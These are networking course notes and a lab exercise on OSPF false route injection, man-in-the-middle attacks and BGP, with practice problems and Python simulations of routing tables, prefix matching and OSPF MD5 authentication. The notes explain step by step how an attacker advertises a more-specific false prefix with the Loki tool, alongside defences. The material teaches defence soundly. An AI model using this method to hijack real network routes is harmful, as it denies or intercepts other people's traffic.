C             -          ∞
D             D          2

Router C
Destination   Next Hop   Cost
A             A          1
B             -          ∞
D             D          2

Router D
Destination   Next Hop   Cost
A             -          ∞
B             B          2
C             C          2

Everyone shares its table with its neighbors.
Solution:
What does this mean for all of Router D’s traffic destined for Router A?
More importantly, why would Router D’s traffic go through Router C instead?
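The evolution of the tables in Practice Problem 16.1 can be checked by simulation. The Python below is an added example, not part of the original notes: it runs a simple synchronous distance-vector exchange over the four-router network read off the tables above (link costs A-B 4, A-C 5, B-D 2, C-D 2 is an assumption taken from the initial tables), lets a chosen router install and advertise a false cost, and optionally lets a router ignore everything one neighbor advertises, which models the passive-interface idea from Section II.2 (Protection Against False Route Injection). The `lies` and `passive` parameters and the table layout are my own.

```python
import math

INF = math.inf

# Constructed link costs, read off the initial tables of Practice Problem 16.1
# (assumption: A-B=4, A-C=5, B-D=2, C-D=2 and no other links).
LINKS = {("A", "B"): 4, ("A", "C"): 5, ("B", "D"): 2, ("C", "D"): 2}


def neighbors(links):
    """Return {router: {neighbor: link cost}} for an undirected link list."""
    nbrs = {}
    for (u, v), cost in links.items():
        nbrs.setdefault(u, {})[v] = cost
        nbrs.setdefault(v, {})[u] = cost
    return nbrs


def initial_tables(nbrs):
    """Each router starts knowing only its directly connected neighbors:
    tables[router][dest] = (next hop, cost), with ('-', INF) for unknown."""
    routers = sorted(nbrs)
    tables = {}
    for r in routers:
        tables[r] = {}
        for d in routers:
            if d != r:
                tables[r][d] = (d, nbrs[r][d]) if d in nbrs[r] else ("-", INF)
    return tables


def run_distance_vector(links, lies=None, passive=None, max_rounds=20):
    """Synchronous distance-vector exchange (Bellman-Ford relaxation).

    lies:    {(liar, dest): fake_cost} - the liar installs and advertises a
             false cost to dest (the page's 'Router C lies about its link to A').
    passive: {(router, neighbor)} - router ignores everything neighbor
             advertises, like an OSPF passive interface (hypothetical model).
    """
    nbrs = neighbors(links)
    tables = initial_tables(nbrs)
    for (liar, dest), fake in (lies or {}).items():
        tables[liar][dest] = (dest, fake)
    passive = passive or set()

    for _ in range(max_rounds):
        # Every router shares its current table with its neighbors.
        adverts = {r: {d: cost for d, (_, cost) in t.items()} for r, t in tables.items()}
        changed = False
        for r in tables:
            for n, link_cost in nbrs[r].items():
                if (r, n) in passive:
                    continue          # routing information on this link is ignored
                for d, adv_cost in adverts[n].items():
                    if d == r:
                        continue
                    if link_cost + adv_cost < tables[r][d][1]:
                        tables[r][d] = (n, link_cost + adv_cost)
                        changed = True
        if not changed:
            break                     # converged
    return tables


def format_table(router, table):
    """Render one table in the page's 'Destination / Next Hop / Cost' layout."""
    lines = [f"Router {router}", "Destination  Next Hop  Cost"]
    for dest, (hop, cost) in sorted(table.items()):
        lines.append(f"{dest:<12} {hop:<9} {'∞' if cost == INF else cost}")
    return "\n".join(lines)


if __name__ == "__main__":
    for title, kwargs in [
        ("Honest routers", {}),
        ("Router C claims cost 1 to A", {"lies": {("C", "A"): 1}}),
        ("Same lie, but D ignores C's advertisements",
         {"lies": {("C", "A"): 1}, "passive": {("D", "C")}}),
    ]:
        print(f"== {title} ==")
        for r, t in run_distance_vector(LINKS, **kwargs).items():
            print(format_table(r, t), end="\n\n")
```

With honest routers D reaches A through B at cost 6. Once C claims cost 1 to A, D switches to C at cost 3 while A's own table is unchanged (it still reaches D through B at cost 6, because A knows its real cost to C). If D simply ignores what C advertises, the lie never takes hold, which is the whole argument for passive interfaces later in the chapter.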
Fortunately, machines cannot lie to one another, but the humans that operate the machines do lie (or make mistakes) and can
force the machines to do the same.
In the previous example, we saw how a simple lie about the distance between two routers could change the direction of traffic
flow within the network, but why is this of concern? Even with this manipulation, if Router D wanted to send packets to
Router A, won’t the information be delivered just as before? (note that only Router D is fooled by Router C’s lie. Router
A’s table is not affected by Router C’s lie and it will still route to Router D via Router B with a total cost of 6. This is
because Router A knows its distance to Router C.)
Hi, remember me? I’m Ciana.
No. Now that Router C is in the middle of Router D and Router A, it can:
1. Observe the traffic moving between these devices.
2. Change the information moving between these devices.
3. Stop the traffic from moving between these devices.
Why is this an issue? Recall from SI110, there are five pillars of information assurance we want
to preserve when offering services through routers and other information systems. 26
1. Confidentiality – protection of information from disclosure to unauthorized
individuals, systems, or entities.
2. Integrity – protection of information, systems, and services from unauthorized
modification or destruction.
3. Availability – timely, reliable access to data and information services by authorized
users.
4. Non-repudiation – the ability to correlate, with high certainty, a recorded action with
its originating individual or entity.
5. Authentication – the ability to verify the identity of an individual or entity.
Grr…Don’t remember me, huh? You’d better for the test!
Practice Problem 16.2
What primary pillar of information assurance is violated in each thing Router C can do once it is in the middle of Router D and
Router A?
(a) The ability to observe traffic violates:
(b) The ability to change traffic violates:
(c) The ability to stop traffic violates:
2. The Man-In-The-Middle (MITM) Attack
This type of problem is called the Man-In-The-Middle attack.
We have seen this once already in Chapter 14. Specifically, the technique used to conduct the MITM attack in Chapter 14
was called ARP-Spoofing because redirecting another computer’s traffic on a single network required your computer to tell a
specific lie about the association between its MAC address and IP address.
Much like a nasty rumor in the Brigade, that lie had to spread around for it to be effective. Similarly, you included your own
MAC address with the target’s IP address through multiple unsolicited ARP-Replies to convince everyone on your local
network that your machine was the target host. Finally, everyone on your local network had to believe your lie for you to
begin receiving packets destined for the target machine.
Do you think it is possible for something like this to happen on a bigger scale? That is, instead of a Man-In-The-Middle
attack on one network as with ARP-spoofing, can this happen between multiple networks?
26 See http://www.usna.edu/CS/si110/lec/l00/lec.html to review these topics and definitions.
Yes it could happen, and things similar to this have already happened, but to understand how requires a bit more
understanding of how networks interconnect. However, just as before with ARP-Spoofing, there are four critical steps
that must occur for an attacker to make this possible.
1. Take control of a machine on the network and manipulate its operation.
2. Force the machine to tell the “right” kind of lie.
3. Force the machine to spread the lie around.
4. Force other machines to believe the lie.
3. Wait a Minute…
“Boring! Okay, so I may not remember much from SI110, but the one thing I do remember is that encryption solves all of our problems. If someone is snooping around and reading my packets, then I will just encrypt them and ruin their ability to influence my communication. Done, may I go now?”
As Mr. Eric Snowden recently revealed, that is exactly what the National Security Agency (NSA) and others would want you to think.27 While it is true that encryption may make eavesdropping harder for the man in the middle, it is not insurmountable. In reality, as the New York Times explains, some of the core encryption protocols of the Internet are already broken. For those that are not, the NSA allegedly spends upwards of $250 million a year on US and foreign industries to covertly influence commercial product designs to make them exploitable. To leverage this advantage, the NSA pays a significant amount of money to become the man in the middle so they can read any Internet traffic, encrypted or not. One example from WIRED magazine talks about a $652 million NSA project to help take control of routers and networks to monitor foreign communications.28 Hopefully, it is clear that understanding how a MITM attack can take place across multiple networks is very important to Cyber Warfare as a whole.
Yes, sir! Please give me more details so that I can understand this critically important material.
II. A Closer Look at How Networks Interconnect
1. An Important Example
Let’s say there is an important website that all midshipmen need to access in order to prepare for EC310 each day. That website is located at IP address 4.4.5.155 on the network 4.4.5.0/24. The midshipmen who need access to it are located on network 192.168.65.0/24, and have one of the 253 available host IP addresses assigned to their laptops.
27 See http://www.nytimes.com/2013/09/06/us/nsa-foils-much-internet-encryption.html?pagewanted=1&_r=2&
28 See http://www.wired.com/threatlevel/2013/09/nsa-router-hacking/
Practice Problem 16.3
Construct the routing table for Router A.
Now, let’s pretend there is an evil instructor (because aren’t all instructors evil?) located on the 5.5.5.0/25 network that
wants to prevent students from reaching the EC310 website at 4.4.5.155. What would that instructor need to do in order
to make the student’s traffic go to some place they did not intend?
a) First, the instructor will need to: take control of a machine on the network and manipulate its operation.
Being an instructor, ITSD has graciously allowed him (or her) privileged access to his office computer for ‘academic
research’, but nowhere else. ITSD has restricted the instructor’s privileged access in order to prevent him from making any
changes that could affect other computers on the network. Therefore, the instructor will need to manipulate his computer in
such a way where it can alter the flow of traffic across the networks and deny midshipmen access to the course website. To
accomplish this, he decides to turn his computer into a router using a special software tool called Loki.29 This tool ‘speaks’
the Open Shortest Path First (OSPF) protocol, which will enable the injection of false routing information into the
networks.
29 Loki is a Python-based framework implementing many packet generation and attack modules for Layer 3 protocols. It was developed by ERNW, an IT security service provider, in 2010. See https://www.ernw.de/research/loki.html for more details.
b) Second, the instructor will need to: force his router to tell the “right” kind of lie.
But what is the “right” kind of lie to tell? Well, that depends on the effect the instructor wants to have on the networks. For
example, if the instructor wanted to cause a panic across the entire Brigade, he or she might say that “buffalo chicken
sandwiches will no longer be offered in King Hall.” However, if he only wanted to terrorize the students in his EC310
section, the instructor could say “you will have a quiz tomorrow over Lessons 1 through 15 worth 99.2003% of your final
grade.”
The instructor’s goal is to stop the students’ traffic from reaching the EC310 web server located at 4.4.5.155. To do this
the instructor would like to direct the students’ traffic to a different location where their web requests will go unanswered.
Knowing that routers forward a packet using the routing-table entry whose network prefix is the longest match for the
destination address, the instructor decides to advertise a false network from his router with a more specific network ID that
will direct the students’ traffic away.
Practice Problem 16.4
What is the first and last IP address of the 4.4.5.0/24 network where the webserver is located?
(a) First Address:
(b) Last Address:
Looking at Router A’s table, what network ID and mask should the evil instructor choose? Other options?
What is the first and last address of the false network the evil instructor will advertise?
(a) First Address:
(b) Last Address:
Does the IP address of the webserver fall within the IP address block that the evil instructor will advertise?
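Longest-prefix matching and the first/last address of a block are easy to compute with Python's standard ipaddress module. The block below is an added example, not code from the notes: it performs the lookup a router does and then, from the defender's side, checks whether a newly advertised prefix would change the route to a protected host. The routing table, the 10.20.30.0/24 network, the 10.20.30.155 web server and the two candidate advertisements are constructed values rather than the addresses in the practice problem, so the problem itself is still yours to work.

```python
import ipaddress

# Constructed routing table (not the one in the notes): (network prefix, outgoing interface).
TABLE = [
    ("0.0.0.0/0", "eth5 (default)"),
    ("10.20.30.0/24", "eth2"),
    ("10.20.40.0/24", "eth3"),
]
PROTECTED_WEBSERVER = "10.20.30.155"   # constructed stand-in for the course web server


def prefix_range(cidr):
    """First and last address covered by a prefix (network and broadcast address)."""
    net = ipaddress.ip_network(cidr, strict=False)
    return str(net[0]), str(net[-1])


def longest_prefix_match(table, dest):
    """Return (prefix, interface) of the most specific entry covering dest,
    which is exactly the rule a router applies when forwarding a packet."""
    addr = ipaddress.ip_address(dest)
    best = None
    for cidr, iface in table:
        net = ipaddress.ip_network(cidr, strict=False)
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, iface)
    return (str(best[0]), best[1]) if best else None


def captured_hosts(table, advertised, hosts, source="untrusted"):
    """Defender's check: which of `hosts` would be re-routed toward `source` if the
    prefix `advertised` were accepted into `table`?  A more specific prefix wins
    longest-prefix match even though the original, wider route is still present."""
    after = table + [(advertised, source)]
    return [h for h in hosts
            if longest_prefix_match(after, h) != longest_prefix_match(table, h)]


if __name__ == "__main__":
    print("10.20.30.0/24 spans", prefix_range("10.20.30.0/24"))
    print("web server normally via", longest_prefix_match(TABLE, PROTECTED_WEBSERVER))
    # A false prefix only matters if it actually contains the target address
    # (constructed candidates: one covers the web server, the other does not).
    for candidate in ("10.20.30.128/25", "10.20.30.0/25"):
        print(candidate, "covers", prefix_range(candidate),
              "-> captured:", captured_hosts(TABLE, candidate, [PROTECTED_WEBSERVER]))
```

The same check is useful in reverse when you audit a router: feed it each prefix a neighbor has recently advertised and the addresses you care about, and any non-empty result is a route that deserves a closer look.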
c) Third, the instructor will need to: force his router to spread the lie around.
Recall from Lesson 15, under the Internet’s Open Shortest Path First (OSPF) protocol, routers communicate with one
another using Link State Packets (LSP). These packets are distributed to all routers through “controlled flooding” to allow
each router to build a full and complete picture of the topology of the entire network. However, before routers swap LSP
with each other, they must become neighbors first and agree on a basic set of operating parameters. Therefore, in order for
the evil instructor to spread his lie about the fake network he must become neighbors first with a router on his network.
Then he can send his malicious LSP advertising the false network he is connected to.
d) Fourth, the instructor will need to: force the other routers to believe the lie.
Fortunately for the attacker, in OSPF this is relatively easy because controlled flooding is already built into the protocol. As
previously mentioned, LSPs are forwarded to all routers through controlled flooding to ensure all routers have a complete
picture of the network’s topology. Thus, once Router B learns about the new false network from the evil instructor, Router B
will turn around and tell Routers A and C.
Practice Problem 16.5
What will Router A’s routing table look like, once it hears the lie about the fake network from Router B?
Thus, whenever a student sends a packet destined for the webserver at 4.4.5.155, where will Router A forward their
packet? Will the EC310 students ever be able to reach the course web page?
Do you think it is possible that something like this could ever happen on the Internet? Unlike the previous example, the
Internet consists of hundreds of thousands of networks stretched across the entire globe. Could it be possible for someone to
change the way traffic flows across such a big and complex distributed system?
Yes it could happen, and things similar to this have already happened, but to understand how requires a bit more understanding
of the Internet first. Specifically, we need to understand the fundamental protocol of the Internet, the Border Gateway Protocol
(BGP). That is, before we can become a locksmith (of the Internet), we need to know a bit more about how the lock (the
Internet) operates.
2. Protection Against False Route Injection
How can we stop such malicious behavior? Recall that by default routers trust the information other routers are sending, but
this does not have to be the case. The Open Shortest Path First protocol has two authentication mechanisms built in to protect
against false route injection. The first is a simple plaintext password added to all LSPs so each router can authenticate the
information it is receiving. If a router sends an LSP without the appropriate password, then the LSP is rejected.
The second method is an MD5-hash of the OSPF packet and a shared secret key. Recall from SI110, that hashing is a
‘one-way’ encryption technique that produces the same message digest (i.e., encrypted output) given the same input string.
Additionally, while it is easy to hash the input string, it is very hard to identify the input string given only the message digest
(remember the Rubik’s cube?). In OSPF, routers can send the hash of the OSPF packet and a shared secret key along with
their LSP to authenticate themselves with other routers. Of course, all routers must know the shared secret key in advance.
This may seem trivial at first, but consider the number of routers at a place like Google or Amazon Web Services where there
are literally thousands of routers.
Lastly, separate from these two authentication mechanisms, most implementations of OSPF allow for creation of passive
interfaces. Just like when your roommate starts getting on your nerves and you tune him or her out by putting your
headphones on, routers can do the same thing. Once a network administrator sets up a passive interface on a router, the
router will ignore all routing information being sent over that interface. However, this requires network administrators to
make smart decisions when setting up the topology of their networks and configuring their routers.
Practice Problem 16.6
Briefly describe two technical solutions to protect against false route injection and identify who is responsible for implementing
them.
Solution #1:
Solution #2:
OPTIONAL:
Interestingly, of the three actions an attacker can take during a MITM attack, what do you think an attacker would most likely
want to do? Observe, change, or stop your traffic? It seems frightening to have our traffic stopped by someone else or changed
as it is moving to its destination, but recent cyber activity has indicated it is more likely an attacker would want to observe your
traffic in the end. Consider the following excerpt from Kevin Mandiant’s report on Advanced Persistent Threat 1 (APT1), a
Chinese cyber warfare unit:
Our evidence indicates that APT1 has been stealing hundreds of terabytes of data from at least 141
organizations across a diverse set of industries beginning as early as 2006. Remarkably, we have witnessed
APT1 target dozens of organizations simultaneously. Once the group establishes access to a victim’s network,
they continue to access it periodically over several months or years to steal large volumes of valuable
intellectual property, including technology blueprints, proprietary manufacturing processes, test results,
business plans, pricing documents, partnership agreements, emails and contact lists from victim
organizations’ leadership. We believe that the extensive activity we have directly observed represents only a
small fraction of the cyber espionage that APT1 has committed.
Once APT1 has compromised a network, they repeatedly monitor and steal proprietary data and
communications from the victim for months or even years. For [141] organizations... we found that APT1
maintained access to the victim’s network for an average of 356 days. The longest time period APT1
maintained access to a victim’s network was at least 1,764 days, or four years and ten months. APT1 was
not continuously active on a daily basis during this time period; however, in the vast majority of cases we
observed, APT1 continued to commit data theft as long as they had access to the network. 30
Notice the chosen behavior of this Chinese cyber warfare unit. Rather than shut down the networks of the various companies
they invaded or change the information located there, they simply observed the traffic and stole copies for themselves. It would
seem their primary desire was not to do damage but to gain information.
30 See http://intelreport.mandiant.com/Mandiant_APT1_Report.pdf for the full report on APT1 originally published in 2013.
Problems
1. What is the underlying assumption between routers in the routing algorithms they use which makes it possible to
conduct a Man-In-The-Middle (MITM) attack?
2. What three things can an attacker do to your network traffic in a Man-In-The-Middle (MITM) attack and what pillar
of Information Assurance is affected during each?
3. Sketch the routing table for Router C for the network shown on page 420.
4. An attacker is located on the 5.6.7.0/24 network and wants to prevent midshipmen from reaching a website at
8.8.8.26. He turns his computer into a router using Loki to advertise a false network to Router C.
(a) Construct the routing table for Router C. Use the template shown below:
(b) Looking at Router C’s routing table, what network address and mask should the attacker choose? In answering
this question, complete the table below.
(c) Complete the routing table entry below with your answer from (b) and draw a line into Router C’s routing table
showing where the attacker’s false network would go.
(d) What is the first and last IP address of the false network you chose for the evil instructor?
(e) Does the IP address of the webserver fall within your choice for the evil instructor’s false network?
(f) Given your answer to part (e), whenever a midshipman sends a packet destined for the webserver at 8.8.8.26
where will Router C forward their packet? Will the midshipman ever be able to reach the important website?
(g) List and briefly describe two technical solutions that could be implemented on Router C to prevent the evil
instructor from injecting false routing information.
(h) Who is responsible for implementing these security measures in a network?
5.
What does a router assume by default when another router sends it information about the state of its links or the
distance between it and other routers?
6.
An attacker is located on the 3.4.5.0/25 network and wants to prevent midshipmen from reaching a website at
8.9.7.96. The network is depicted below. He turns his computer into a router using Loki and advertises a false
network of 8.9.7.80/28 to Router A.
[Network diagram for Problem 6 (labels recovered from the figure): Internet; RA (eth0, eth1, eth2); RB (eth0, eth1); EVL (eth0); networks 8.9.7.64/26, 1.2.3.0/24 and 3.4.5.0/25; addresses 8.9.7.96 (webserver), 8.9.7.65, 8.9.7.66, 1.2.3.1, 1.2.3.10, 3.4.5.1, 3.4.5.32 and 7.7.7.1; false network 8.9.7.80/28 advertised by EVL.]
(a) Fill in the blanks in the table below to complete Router A’s routing table.
(b) In the line provided below Router A’s routing table, fill in the false route the attacker would inject.
(c) Draw a line from the false route pointing to the location in which it would be injected into Router A’s routing
table.
(d) Will the attacker be successful in redirecting the midshipmen’s traffic? Justify your answer.
(e) List and briefly describe two technical solutions that could be implemented on Router A to prevent the attacker
from injecting false routing information.
(f) Who is responsible for configuring these security measures on Router A: the Network User, the Network
Administrator, the Network Hardware Manufacturer or the Network Programmer?
Security Exercise 16
Introduction
It is interesting to hear the theory behind a Man-In-The-Middle attack, but it is better to experience it yourself.
1. Set-Up
Equipment required:
 Your issued Laptop.
o Turn off the wireless adapter.
o Connect the blue Ethernet cable at your desk to your issued laptop.
 Your completed network diagram from SX#15 and a printed copy of this security exercise.
o Separate the answer sheet and have it ready to fill in.
 VMware Workstation
o Power on your Cyber2 VM, then click VM and Settings.
o Select Network Adapter and ensure that Connected, Connected at power on, and Bridged: Connected directly to the physical network, and Replicate physical network connection state are selected or checked, then click OK.
o Open a terminal in your Cyber2 VM and execute the command
sudo dhclient
Once it finishes, execute the command
ifconfig
Your screen should look similar to Figure 1 on page 390. Interface eth1 should be assigned an IP address of 192.168.XX.YYY, where XX is your classroom number and YYY is a number between 100 and 199. If not, notify your instructor or lab technician.
Figure 1 – ifconfig executed after initial lab setup.
Part 2: The Evil Instructor
1. The Attack
The evil instructor wants to deny you access to www.usna.edu. Just like you discovered in SX#15, he has found the IP
address for the website and understands that routers work using the longest mask matching principle. He also understands
the default assumption between routers in the routing algorithms they use to construct their routing tables.
Let’s start by verifying the correct website.
 Use traceroute -n to identify the route to www.usna.edu.
 Access www.usna.edu using Firefox to verify the name of the site administrator.
Question 1: What is the assumption the evil instructor understands about routers in the routing algorithms they use?
STOP! Observe Demonstration #1
 When directed, label part m) of your network diagram.
 When directed, use traceroute to identify the new route to www.usna.edu.
 When directed, access www.usna.edu using Firefox. If already open, refresh your browser using either method below.
Ctrl + Shift + R
or
Shift +
Question 2: After the evil instructor injected false routing information into the network, where did your traffic destined for
www.usna.edu go? Was the website still available?
Question 3: What did your evil instructor attack in order to deny you access to www.usna.edu? Pick one.
a) your virtual machine
b) the Webserver
c) a script running on the webpage
d) the network
Question 4: What pillar of information assurance did this affect?
STOP! Observe Demonstration #2
 When directed, refresh www.usna.edu using either method below.
Ctrl + Shift + R
or
Shift +
 When directed, use traceroute to identify the new route to www.usna.edu.
Question 5: Who maintains the website at www.usna.edu?
It may not seem very significant to have your homework interrupted or altered by a Man-In-The-Middle attack, but what if
the website you were visiting was more important? For example, what if you needed to check on the status of your second
class loan with your bank?
STOP! Observe Demonstration #3
 When directed, refresh www.usna.edu using either method below.
Ctrl + Shift + R
or
Shift +
Question 6: What fake website did your evil instructor misguide you to and what pillar of information assurance did this
affect?
Recall from SI110 that the X.509 certificate system provides a mechanism to establish a secure connection with a website. It
provides assurance of the binding between a website’s domain name and its public key. That is, when the lock icon closes in our
browser and we establish a secure connection with a website, we know that the public key used to transfer the symmetric
encryption key belongs to that particular domain name.
Question 7: If the X.509 certificate system only offers proof that a public key belongs to a specific domain name, whose
responsibility is it to verify if a website is authentic?
2. The Fix #1: Easy as 123456
Recall from Lesson #16, the Open Shortest Path First (OSPF) protocol has two authentication mechanisms built in to protect
against the injection of false routing information. The first is a simple plaintext password added to all Link State Packets
(LSPs) so each router can authenticate the information it is receiving. However, because the password is included in plaintext
with each LSP, anyone observing the LSPs with Wireshark can easily discover the ‘secret’ password. This is similar to how you
discovered the victim’s password in SX#14.
Much more interesting is the second method for authentication in OSPF, an MD5-hash of the OSPF packet and a shared
secret key. Recall from SI110, that hashing is a ‘one-way’ encryption technique that produces the same message digest (i.e.,
encrypted output) given the same input string. Additionally, while it is easy to hash the input string, it is very hard to identify
the input string given only the message digest (remember the Rubik’s cube?). In OSPF, routers can send the hash of the
OSPF packet and a shared secret key along with their LSP to authenticate themselves with other routers. Of course, all
routers must know the shared secret key in advance. This may seem trivial at first, but consider the number of routers at a
place like Google or Amazon Web Services where there are literally thousands of routers.
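To see why the MD5 scheme is stronger than the plaintext password, here is an added Python model (mine, not the notes' or any router vendor's code) of the two OSPF authentication types described in Section II.2 of Chapter 16 and again above. It follows the shape of RFC 2328 Appendix D: the plaintext type simply carries the password in the packet, and the cryptographic type appends MD5(packet || key) with the key padded to 16 bytes. The packet contents, the keys and the function names are constructed for the example.

```python
import hashlib
import hmac

KEY_LEN = 16  # OSPF MD5 keys are padded (or truncated) to 16 bytes, RFC 2328 App. D

# Constructed link-state update payload; on a real router this is the whole OSPF packet.
LSP = b"OSPF LSU seq=7 net=10.20.30.128/25 cost=1"
SHARED_KEY = b"s3cret-ospf-key"


def plaintext_auth(packet, password):
    """Type 1 authentication: the password rides in the clear with every packet,
    so anyone capturing the link (e.g. with Wireshark) reads it directly."""
    return password[:8].ljust(8, b"\x00") + packet


def pad_key(key):
    return key[:KEY_LEN].ljust(KEY_LEN, b"\x00")


def md5_auth_digest(packet, key):
    """Type 2 authentication: MD5 over the packet followed by the shared key.
    The key itself never appears on the wire, only the 16-byte digest."""
    return hashlib.md5(packet + pad_key(key)).digest()


def sign(packet, key):
    """Sender side: append the digest to the packet."""
    return packet + md5_auth_digest(packet, key)


def verify(wire, key):
    """Receiver side: recompute the digest with its own copy of the shared key.
    A packet from a router that does not know the key, or a packet altered in
    transit, fails and is discarded."""
    if len(wire) <= KEY_LEN:
        return False
    packet, digest = wire[:-KEY_LEN], wire[-KEY_LEN:]
    return hmac.compare_digest(digest, md5_auth_digest(packet, key))


if __name__ == "__main__":
    wire = sign(LSP, SHARED_KEY)
    print("genuine LSP verifies:", verify(wire, SHARED_KEY))
    print("same LSP, wrong key:", verify(wire, b"123456"))
    print("forged LSP without the key:", verify(sign(LSP, b"guess"), SHARED_KEY))
    print("tampered in transit:", verify(wire[:25] + b"9" + wire[26:], SHARED_KEY))
    print("plaintext type exposes password:", b"hunter2" in plaintext_auth(LSP, b"hunter2"))
```

Two things to notice. The digest protects both the sender's identity (no key, no valid digest) and the contents (change one byte of the advertised network and verification fails), so a router using the MD5 type drops both the evil instructor's forged LSP and any LSP altered on the way. On the other hand the digest is only as good as the key it is computed from, which is exactly the point of Question 8 below: every router in the area shares it, and a short, guessable key makes the scheme little better than the plaintext one.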
Question 8: We have all been told to change our password regularly to increase security, but do you think it is easy to change
the shared secret key in every router at a place like Google or Amazon (or even the Naval Academy)? Do you think there
may be an incentive for network administrators to make the shared secret key something easy to remember?
STOP! Observe Demonstration #4
 When directed, refresh www.usna.edu using either method below.
Ctrl + Shift + R
or
Shift +
Question 9: What are some important things to consider when choosing a password?
3. The Fix #2: Passive Aggression
Consider the topology of your network diagram from a security perspective.
Question 10: Is there any reason Router B should listen to routing information being sent over interface eth2?
Most implementations of OSPF allow for creation of passive interfaces. Just like when your roommate starts getting on your
nerves and you tune him or her out by putting your headphones on, routers can do the same thing. Once a network
administrator sets up a passive interface on a router, the router will ignore all routing information being sent over that
interface. However, this requires network administrators to make smart decisions when setting up the topology of their
networks and configuring their routers.
STOP! Observe Demonstration #5
Question 11: How many OSPF Hello packets did your instructor receive once the passive interface was enabled?
Question 12: As a user who do you trust by default for the safe and effective administration of your network? Do you have
the ability to control the security of the network on your own?
4. Clean Up
 VMware Workstation
o In the VMware Workstation menu click VM and Settings.
o Select Network Adapter and ensure that Connected, Connected at power on, and NAT: Used to share the host’s IP address are not selected or unchecked, then click OK.
o Suspend your Cyber2 VM.
o Disconnect the blue Ethernet cable.
o Turn on your wireless adapter.
Security Exercise 16 Answer Sheet
Name:
Router A’s Routing Table
Mask    Network Address    Next-Hop Address    Interface
/0      0.0.0.0            Default             eth5
False Route Injection:
Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6:
Question 7:
Question 8:
Question 9:
Question 10:
Question 11:
Question 12:
Chapter 17: Border Gateway Protocol
Objectives:
(a) Discuss the major concerns with the use of a single protocol for the Internet.
(b) Describe the various autonomous system categories.
(c) Utilize path attributes to determine the path of a packet across ASes
(d) Demonstrate the ability to state the BGP announcements that would be made given an internet diagram.
I. Internet Structure
Up to this point, all we’ve looked at are a small set of Local Area Networks (LANs) which have been connected together
through a limited number of routers. As an example, consider the network topology discussed in Chapter 16. It was comprised
of only a few small networks and a few routers which facilitated access to a single webserver.
This group of networks would be easily manageable by one organization, but this network is not representative of the Internet
today. Today’s Internet comprises thousands of networks managed by a countless number of different people spread across
the entire globe. But how did the Internet become so big, and what did the Internet look like when it first began?
1. The Internet of Old
It used to be that the structure of the Internet was like that of a tree, one central trunk (a.k.a. the backbone) that fed to all the
other downstream entities. The picture below shows the Internet circa 1990. End users (such as Stanford and UNM in the
figure) connected to "service providers" (such as Westnet regional) which in turn connected to a single backbone. Recall from
Security Exercise 14 that the single backbone, circa 1990, was funded by the National Science Foundation—hence the name
"The NSFNET backbone".
Peterson and Davie, Computer Networks, A Systems Approach, Morgan Kaufmann, 2007
We also learned in Security Exercise 14 that the Internet evolved over time. Multiple companies offered to provide backbone
services, and gradually the original tree-like structure (with a single backbone) was replaced by a multi-backbone structure.
Additionally, multiple networks oftentimes decided to connect directly together, avoiding the backbone altogether. The
companies providing backbone services also recognized the utility in connecting the backbones together.
2. Today’s Internet
Representation of Today’s Internet Structure
Today there are several backbones run by different private corporations and governments to provide global connectivity. You
may even recognize some of these backbones. They are key communication players like:
AT&T, Sprint, Level 3 Communications, Verizon, and others…
Much of the Internet's traffic is eventually routed through at least one backbone. Thus, a particular backbone can manipulate
the traffic that goes through it. Recall from Chapter 11 that we saw several examples of how this power was abused, through
error or malicious intent, to observe, change or stop the flow of traffic across the Internet. Specifically, you learned how
YouTube was brought down by the actions of the Pakistan Telecom Authority on February 4th, 2008.
But, for now, let’s understand a bit more about how these backbones interconnect.
The backbones are interconnected by peering points that allow connectivity between the backbones. These peering points
(Internet Exchanges) are voluntary connections between different networks which increase redundancy and capacity. Although
competitors, backbone providers desire these peering arrangements just in case one backbone is suddenly asked to deliver more
traffic than it is capable of (in which case it can send the excess to a competitor) or in case one backbone is knocked offline
completely.
The provider networks use the backbones for global connectivity, and, in turn, the customer networks utilize the services of
the provider networks. Any of the three (the backbones, the provider networks, or the customer networks) can provide services
(although at different levels) and can be called Internet Service Providers (ISP).
Note some of the complexities in the figure above. For example, customer networks can connect to two (or more) different
provider networks in order to increase redundancy. Provider networks can connect directly to two (or more) backbones, again
for redundancy. Additionally, provider networks can connect directly to peering points within an Internet Exchange.
396
Still, though, the picture of the Internet above is a cartoonish oversimplification. Consider the picture of the Internet shown
below, noting the small inset that is expanded.31
Image of a small grouping of networks within the Internet
An Aside
The structure of the Internet has as much to do with money and politics as it does
with technology. Consider the fact that the backbones are run by companies such as
AT&T, Sprint and Verizon. Why them? These companies had the regulatory right-of-way clearance (i.e., the legal permission) to run long-distance cable across the
country, and the finances to support the operation.
You may wonder about those peering points—why would a company agree to allow
a competitor the option of using their backbone network? Well… consider what the Internet would look like without
peering points! We would not have a single Internet—we would have an AT&T Internet, a Sprint Internet, a Verizon
Internet, etc. That would cause more problems for everyone. Using peering points allows connectivity between the
backbones, preserving the operating idea of a single network.
A major peering point is the networking equivalent of one of those Paris traffic circles: a huge amount of traffic,
very busy, very high speed, somewhat mind boggling. The Border Gateway Protocol which we discuss in this
lecture implements orderly negotiation among the peering, bringing some order to that chaos.
3. Inherent Problems with a Single Routing Protocol
As of December 31, 2013, there were 7.2 billion people in the world, of which 2.8 billion were Internet users.32 All of these
users collectively produce a gargantuan amount of network traffic, which traverses many, many networks (with many, many
31 For an alternative view of the Internet, arranged in a spherical shape, see
http://www.technologyreview.com/news/408104/mapping-the-internet/ .
32 http://www.internetworldstats.com/stats.htm
397
interconnecting routers). With all these users and devices, there is no way that routing on the Internet can be accomplished
using a single protocol. There are two major issues that prevent the use of a single global routing algorithm on the Internet:
a. Scalability:
Can you imagine the size of the routing tables each router would have to maintain? Routing tables would become—
what's the word… behemothic? These elephantine routing tables would mean that:
1) Searching for a destination would be extremely time consuming; and
2) Updating such unwieldy tables would create excessive amounts of needless traffic.
b. Administration:
Even if we could manage the scalability issue, a larger issue concerning network administration looms before us.
We have described two different routing methodologies: link state routing and distance vector routing. Both
approaches model the underlying network as a graph, where the routers comprise the nodes of the graph, and an edge
is drawn between two routers if the routers are directly connected. Recall that each edge in the graph has a weight
associated with it. Both of the routing approaches seek to determine a route from a source (say Router A) to a
destination (say Router B) that has a minimum total weight. For example, if the weights on the graph edges represent
cost, the algorithms will determine the minimum cost route from A to B. If, on the other hand, the weights represent
time delay, then the algorithms will determine the minimum delay route (i.e., the fastest route) from A to B.
You may have already noticed a problem with this approach to routing. Suppose Provider Network X owns and runs
